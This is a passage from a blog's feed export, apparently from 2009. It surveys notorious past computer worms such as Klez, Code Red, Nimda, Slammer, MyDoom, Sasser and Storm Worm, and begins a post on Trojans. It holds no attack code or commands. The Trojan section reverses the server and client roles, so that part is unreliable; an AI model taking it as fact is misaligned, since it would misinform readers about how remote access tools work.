align="left"&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt; &lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;                 The Klez virus was discovered in the 2001. The variations of this virus plagued the Internet for several months. The basic Klez worm infected a victim's computer through an e-mail message, replicated itself and then sent itself to people in the victim's address book. Some variations of the Klez virus carried other harmful applications that could render a victim's computer inoperable. Depending on the version, the Klez virus could act like a normal computer virus, a worm or a Trojan horse. It could even disable virus-scanning software and pose as a virus-removal tool. Fortunately for consumers, there's no shortage of antivirus software suites on the market.&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhc6lL3W7I/AAAAAAAAABY/FkFEXl-9G5U/s1600-h/kloez.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 317px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhc6lL3W7I/AAAAAAAAABY/FkFEXl-9G5U/s320/kloez.jpg" alt="" id="BLOGGER_PHOTO_ID_5289579923830692786" border="0"&gt;&lt;/a&gt; &lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in; text-align: center;"&gt;&lt;font size="3"&gt;&lt;font style="font-style: italic; font-weight: bold;"&gt;Scree shot of Klez Virus &lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Shortly after it appeared on the Internet, hackers modified this Klez virus in a way that made it far more effective. Like other viruses, it could peep into a victim's address book and send itself to contacts. But it could also take another name from the contact list and place that address in the "From" field in the e-mail client. It's called spoofing -- the e-mail appears to come from one source when it's really coming from somewhere else.&lt;/font&gt;&lt;/p&gt;     &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Spoofing an e-mail address accomplishes a couple of goals. For one thing, it doesn't do the recipient of the e-mail any good to block the person in the "From" field, since the e-mails are really coming from someone else. A Klez worm programmed to spam people with multiple e-mails could clog an inbox in short order, because the recipients can't judge what is the real source of the problem. Also, the e-mail's recipient might recognize the name in the "From" field and therefore be more chance for the recipient to open it.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;4. &lt;font style="font-weight: bold;" size="3"&gt;Code Red and Code Red II&lt;br /&gt;&lt;br /&gt;&lt;/font&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Code Red and Code Red II worms popped up in  2001. Both worms exploited an operating system's vulnerability that was found in machines running Windows 2000 and Windows NT. The vulnerability was a buffer overflow problem, which means when a machine running on these operating systems receives more information than its buffers can handle, it starts to overwrite adjacent memory.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The original Code Red worm initiated a distributed denial of service (DDoS) attack on the White House. That means all the computers infected with Code Red tried to contact the Web servers at the White House at the same time causing the overloading of the machines.&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhc63thH5I/AAAAAAAAABg/G-ZssmYjXHw/s1600-h/code+red.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 214px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhc63thH5I/AAAAAAAAABg/G-ZssmYjXHw/s320/code+red.jpg" alt="" id="BLOGGER_PHOTO_ID_5289579928803680146" border="0"&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; text-align: center; font-weight: bold; font-style: italic;"&gt;&lt;font size="3"&gt;The CERT Coordination Center at Carnegie-Mellon university published an advisory alerting the public to the dangers of the Code Red virus.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;A Windows 2000 machine infected by the Code Red II worm no longer obeys the owner. That's because the worm creates a backdoor into the computer's operating system, allowing a remote user to access and control the machine. In computing terms, this is a system-level compromise, and it's bad news for the computer's owner. The person behind the virus can access information from the victim's computer or even use the infected computer to commit crimes. That means the victim not only has to deal with an infected computer, but also may fall under suspicion for crimes he or she didn't commit.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;While Windows NT machines were more vulnerable to the Code Red worms, the viruses' effect on these machines wasn't as extreme. Web servers running Windows NT might crash more often than normal, but that was about as bad as it got. Compared to the woes experienced by Windows 2000 users, that's not so bad.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Microsoft released software patches that addressed the security vulnerability in Windows 2000 and Windows NT. Once patched, the original worms could no longer infect a Windows 2000 machine; however, the patch didn't remove viruses from infected computers -- victims had to do that themselves.&lt;/font&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;5.&lt;font style="font-weight: bold;"&gt; Nimda&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Another virus to hit the Internet in 2001 was the Nimda (which is admin spelled backwards) worm. Nimda spread through the Internet rapidly, becoming the fastest propagating computer virus at that time. In fact, according to TruSecure CTO Peter Tippett, it only took 22 minutes from the moment Nimda hit the Internet to reach the top of the list of reported attacks.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Nimda worm's primary targets were Internet servers. While it could infect a home PC, its real purpose was to bring Internet traffic to a crawl. It could travel through the Internet using multiple methods, including e-mail. This helped spread the virus across multiple servers in record time.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhc60QJ6dI/AAAAAAAAABo/TOeRp4wDJA0/s1600-h/nimda_removal.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 228px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhc60QJ6dI/AAAAAAAAABo/TOeRp4wDJA0/s320/nimda_removal.gif" alt="" id="BLOGGER_PHOTO_ID_5289579927875217874" border="0"&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in; text-align: center;"&gt;&lt;font size="3"&gt;&lt;font style="font-weight: bold; font-style: italic;"&gt;Removal of Nimda Virus&lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Nimda worm created a backdoor into the victim's operating system. It allowed the person behind the attack to access the same level of functions as whatever account was logged into the machine currently. In other words, if a user with limited privileges activated the worm on a computer, the attacker would also have limited access to the computer's functions. On the other hand, if the victim was the administrator for the machine, the attacker would have full control.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The spread of the Nimda virus caused some network systems to crash as more of the system's resources became fodder for the worm. In effect, the Nimda worm became a distributed denial of service (DDoS) attack.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt; &lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;6.&lt;font style="font-weight: bold;"&gt; SQL Slammer/Sapphire&lt;/font&gt;&lt;/font&gt;&lt;/p&gt; &lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Slammer virus hit South Korea hard, cutting it off from the Internet and leaving Internet cafes like this one relatively empty.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;­In late January 2003, a new Web server virus spread across the Internet. Many computer networks were unprepared for the attack, and as a result the virus brought down several important systems. The Bank of America's ATM service crashed, the city of Seattle suffered outages in 911 service and Continental Airlines had to cancel several flights due to electronic ticketing and check-in errors.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhhVqqPe0I/AAAAAAAAACI/ajFfv4XZIuM/s1600-h/sql+slammer.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 142px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhhVqqPe0I/AAAAAAAAACI/ajFfv4XZIuM/s320/sql+slammer.gif" alt="" id="BLOGGER_PHOTO_ID_5289584787203259202" border="0"&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The culprit was the SQL Slammer virus, also known as Sapphire. By some estimates, the virus caused more than $1 billion in damages before patches and antivirus software caught up to the problem. The progress of Slammer's attack is well documented. Only a few minutes after infecting its first Internet server, the Slammer virus was doubling its number of victims every few seconds. Fifteen minutes after its first attack, the Slammer virus infected nearly half of the servers that act as the pillars of the Internet .&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;7.&lt;font style="font-weight: bold;"&gt; &lt;/font&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt;&lt;/style&gt;&lt;font style="font-weight: bold;" size="3"&gt;MyDoom&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The MyDoom virus inspired politicians like U.S. Senator Chuck Schumer to propose a National Virus Response Center.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The MyDoom (or Novarg) virus is another worm that can create a backdoor in the victim computer's operating system. The original MyDoom virus have several variants had two triggers. One trigger caused the virus to begin a denial of service (DoS) attack starting Feb. 1, 2004. The second trigger commanded the virus to stop distributing itself on Feb. 12, 2004. Even after the virus stopped spreading, the backdoors created during the initial infections remained active.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Later that year, a second outbreak of the MyDoom virus gave several search engine companies grief. Like other viruses, MyDoom searched victim computers for e-mail addresses as part of its replication process. But it would also send a search request to a search engine and use e-mail addresses found in the search results. Eventually, search engines like Google began to receive millions of search requests from corrupted computers. These attacks slowed down search engine services and even caused some to crash.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;MyDoom spread through e-mail and peer-to-peer (P-P) networks. According to the security firm MessageLabs, one in every 12 e-mail messages carried the virus at one time. MyDoom could spoof e-mails so that it became very difficult to track the source of the infection.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;8.&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt;&lt;/style&gt;&lt;font size="3"&gt; &lt;font style="font-weight: bold;"&gt;Sasser and Netsky&lt;/font&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Sometimes computer virus programmers escape detection. But once in a while, authorities find a way to track a virus back to its origin. Such was the case with the Sasser and Netsky viruses. A 17-year-old German named Sven Jaschan created the two programs and unleashed them onto the Internet. While the two worms behaved in different ways, similarities in the code led security experts to believe they both were the work of the same person.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Sasser worm attacked computers through a Microsoft Windows vulnerability. Unlike other worms, it didn't spread through e-mail. Instead, once the virus infected a computer, it looked for other vulnerable systems. It contacted those systems and instructed them to download the virus. The virus would scan random IP addresses to find potential victims. The virus also altered the victim's operating system in a way that made it difficult to shut down the computer without cutting off power to the system.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Netsky virus moves through e-mails and Windows networks. It spoofs e-mail addresses and propagates through a 22,016-byte file attachment. As it spreads, it can cause a denial of service (DoS) attack as systems collapse while trying to handle all the Internet traffic. At one time, security experts at Sophos believed Netsky and its variants accounted for 25 percent of all computer viruses on the Internet.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhc66wqx8I/AAAAAAAAABw/sdkSF_nFtOk/s1600-h/Sasser.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 319px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhc66wqx8I/AAAAAAAAABw/sdkSF_nFtOk/s320/Sasser.jpg" alt="" id="BLOGGER_PHOTO_ID_5289579929622202306" border="0"&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in; text-align: center; font-weight: bold; font-style: italic;"&gt;&lt;font size="3"&gt;Image of &lt;/font&gt;&lt;font size="3"&gt;Sven Jaschan&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Sven Jaschan spent no time in jail; he received a sentence of one year and nine months of probation. Because he was under 18 at the time of his arrest, he avoided being tried as an adult in German courts.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;9. &lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt;&lt;/style&gt;&lt;font style="font-weight: bold;" size="3"&gt;Leap-A/Oompa-A&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;This virus attacks Macs than ordinary PCs. Mac computers are partially protected from virus attacks because of a concept called security through obscurity. Apple has a reputation for keeping its operating system (OS) and hardware a closed system -- Apple produces both the hardware and the software. This keeps the OS obscure. Traditionally, Macs have been a distant second to PCs in the home computer market. A hacker who creates a virus for the Mac won't hit as many victims as he or she would with a virus for PCs.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;In 2006, the Leap-A virus, also known as Oompa-A, debuted. It uses the iChat instant messaging program to propagate across vulnerable Mac computers. After the virus infects a Mac, it searches through the iChat contacts and sends a message to each person on the list. The message contains a corrupted file that appears to be an innocent JPEG image.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_mPzqYV2-K04/SWhhVQtxXiI/AAAAAAAAACA/tvtwcReFckY/s1600-h/leap+a.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 254px;" src="http://1.bp.blogspot.com/_mPzqYV2-K04/SWhhVQtxXiI/AAAAAAAAACA/tvtwcReFckY/s320/leap+a.png" alt="" id="BLOGGER_PHOTO_ID_5289584780238741026" border="0"&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in; text-align: center;"&gt;&lt;font size="3"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;A Screen Shot of Leap-A virus&lt;/span&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Leap-A virus doesn't cause much harm to computers, but it does show that even a Mac computer can fall prey to malicious software. As Mac computers become more popular, we'll probably see more hackers create customized viruses that could damage files on the computer or snarl network traffic.&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt; &lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;10. &lt;font style="font-weight: bold;"&gt;Storm Worm&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The latest virus on our list is the dreaded Storm Worm. It was late 2006 the computer security experts first identified the worm. The public began to call the virus the Storm Worm because one of the e-mail messages carrying the virus had as its subject "230 dead as storm batters Europe." Antivirus companies call the worm other names. For example, Symantec calls it Peacomm while McAfee refers to it as Nuwar. This might sound confusing, but there's already a 2001 virus called the W32. Storm.Worm. The 2001 virus and the 2006 worm are completely different programs.&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_mPzqYV2-K04/SWhc7LmGLYI/AAAAAAAAAB4/9h3xuWVVX2w/s1600-h/StormWormValentine.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 236px;" src="http://1.bp.blogspot.com/_mPzqYV2-K04/SWhc7LmGLYI/AAAAAAAAAB4/9h3xuWVVX2w/s320/StormWormValentine.jpg" alt="" id="BLOGGER_PHOTO_ID_5289579934141263234" border="0"&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in; text-align: center;"&gt;&lt;font size="3"&gt;&lt;font style="font-weight: bold; font-style: italic;"&gt;A Screen shot of Storm Worm&lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;&lt;br /&gt;&lt;/font&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;The Storm Worm is a Trojan horse program. Its payload is another program, though not always the same one. Some versions of the Storm Worm turn computers into zombies or bots. As computers become infected, they become vulnerable to remote control by the person behind the attack. Some hackers use the Storm Worm to create a botnet and use it to send spam mail across the Internet.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Many versions of the Storm Worm fool the victim into downloading the application through fake links to news stories or videos. The people behind the attacks will often change the subject of the e-mail to reflect current events. For example, just before the 2008 Olympics in Beijing, a new version of the worm appeared in e-mails with subjects like "a new deadly catastrophe in China" or "China's most deadly earthquake." The e-mail claimed to link to video and news stories related to the subject, but in reality clicking on the link activated a download of the worm to the victim's computer.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Several news agencies and blogs named the Storm Worm one of the worst virus attacks in years. By July 2007, an official with the security company Postini claimed that the firm detected more than 200 million e-mails carrying links to the Storm Worm during an attack that spanned several days. Fortunately, not every e-mail led to someone downloading the worm.&lt;/font&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;font size="3"&gt;Although the Storm Worm is widespread, it's not the most difficult virus to detect or remove from a computer system. If you keep your antivirus software up to date and remember to use caution when you receive e-mails from unfamiliar people or see strange links, you'll save yourself some major headaches.&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7887925767760236501?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7887925767760236501/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/top-10-notorious-viruses.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7887925767760236501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7887925767760236501'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/top-10-notorious-viruses.html' title='Top 10 Notorious Viruses'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mPzqYV2-K04/SWhLQz5HA1I/AAAAAAAAABI/5h8Q8ptGJMw/s72-c/computer-virus-picturejpg.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7985260057354696823</id><published>2009-01-05T20:37:00.000-08:00</published><updated>2009-01-10T21:48:09.420-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FTP'/><category scheme='http://www.blogger.com/atom/ns#' term='software killers'/><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='wingate'/><category scheme='http://www.blogger.com/atom/ns#' term='worm'/><category scheme='http://www.blogger.com/atom/ns#' term='spyware'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='adware'/><category scheme='http://www.blogger.com/atom/ns#' term='proxy'/><title type='text'>Other Malicious Softwares</title><content type='html'>&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt;&lt;/style&gt;         In  the olden days of computing the only thing the viruses spread through is the infected floppies. The booting from infected floppies causes the viruses to spread in to the host machine. With the advancement of the technology the medium of spreading also widened. The medium of spreading became internet, pen drives etc. The internet service has resulted in the formation of several malicious softwares. There are several such softwares available in the internet. &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Trojans&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;                  The most important difference between the Trojans and viruses is that Trojans cannot spread themselves whereas the viruses spread themselves. The Trojans disguise themselves as useful softwares and the user will download and install it thinking that it is a useful software. He only recognizes the harmful effect of Trojans only after it has started its job.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;                   The Trojan has two parts: a server and a client. The server is the part that is installed in the attacker's system. It is the client that disguised themselves as a useful software and get installed in the victims machine. The client is present in the peer to peer networks and unofficial download sites. Once the Trojans enter in to the victims site, it has vast capability of destruction. The Trojans are highly sophisticated that they can be used according to the wish of the attacker. The attacker can decide the degree of harmness that can be caused by the Trojans. There are different types of Trojans. Some of them are listed below. A Trojan could have any or one of the combination of the below mentioned functionalities.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Remote Access Trojans&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;              These Trojans give full control of the victim's machine to the attacker. The attacker can gather several information from the victim's machine including confidential thins like passwords, credit card number etc stored in the victim's machine.&lt;/p&gt; 